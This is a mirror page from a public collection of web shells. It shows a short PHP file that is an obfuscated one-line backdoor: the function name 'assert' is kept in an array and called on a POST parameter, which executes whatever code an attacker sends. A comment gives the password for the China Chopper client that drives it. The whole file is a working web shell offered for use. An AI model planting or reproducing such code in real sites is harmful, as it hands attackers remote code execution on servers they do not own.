mirror of
https://github.com/tennc/webshell.git
synced 2025-12-07 13:21:28 +00:00
5 lines
117 B
PHP
5 lines
117 B
PHP
<?php
|
|
$item['tt'] = 'assert';
|
|
$array[] = $item;
|
|
$array[0]['tt']($_POST['tt1234']); //caidao password: tt1234
|
|
?>
|